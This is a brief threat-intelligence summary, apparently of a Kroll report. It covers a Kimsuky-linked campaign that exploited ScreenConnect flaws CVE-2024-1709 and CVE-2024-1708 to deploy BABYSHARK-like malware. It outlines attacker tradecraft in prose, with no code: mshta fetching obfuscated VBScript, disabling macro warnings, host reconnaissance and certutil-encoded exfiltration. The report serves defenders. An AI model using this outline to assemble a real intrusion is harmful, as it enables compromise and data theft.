Kroll observed a campaign that exploited ConnectWise ScreenConnect vulnerabilities CVE-2024-1709 and CVE-2024-1708 to deploy malware similar to BABYSHARK, previously associated with Kimsuky or KTA082. After gaining hands on keyboard access through an exposed ScreenConnect setup wizard, the actor ran mshta.exe to fetch obfuscated VBScript that generated changing second stage URLs. The malware disabled Office macro warnings for several Word and Excel versions, collected host, user, network, security software, installed software, and process data, then encoded the results with certutil for exfiltration. Kroll noted overlap with earlier Kimsuky tradecraft, including data hidden in PEM files and BABYSHARK like functionality.